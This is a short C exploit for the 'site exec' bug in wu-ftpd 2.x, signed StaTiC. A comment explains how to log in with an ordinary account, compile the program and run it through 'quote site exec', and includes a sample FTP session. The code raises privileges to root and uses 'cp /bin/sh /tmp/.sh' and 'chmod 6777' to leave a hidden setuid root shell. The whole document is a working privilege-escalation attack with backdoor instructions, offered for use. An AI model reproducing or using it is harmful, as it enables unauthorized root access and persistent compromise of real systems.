/*
Explot wu-ftp 2.x (site exec bug)

You need to have an account on the system running wu-ftpd

Compile this program in yer dir:
	cc -o ftpbug ftpbug.c

Login to the system:

220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready. 
Name (exploitablesys:root): goodaccount
331 Password required for goodaccount.
Password: (password)
230 User goodaccount logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "site exec bash -c id"      (see if sys is exploitable)
200-bash -c id
200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users)
200  (end of 'bash -c id')
ftp> quote "site exec bash -c /yer/home/dir/ftpbug"
200-bash -c /yer/home/dir/ftpbug
200  (end of 'bash -c /yer/home/dir/ftpbug')
ftp> quit
221 Goodbye.

Now you have a suid root shell in /tmp/.sh 
Have fun

StaTiC  (statik@free.org)

*/


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

main()
{
   seteuid(0);
   system("cp /bin/sh /tmp/.sh");
   system("chmod 6777 /tmp/.sh");
}

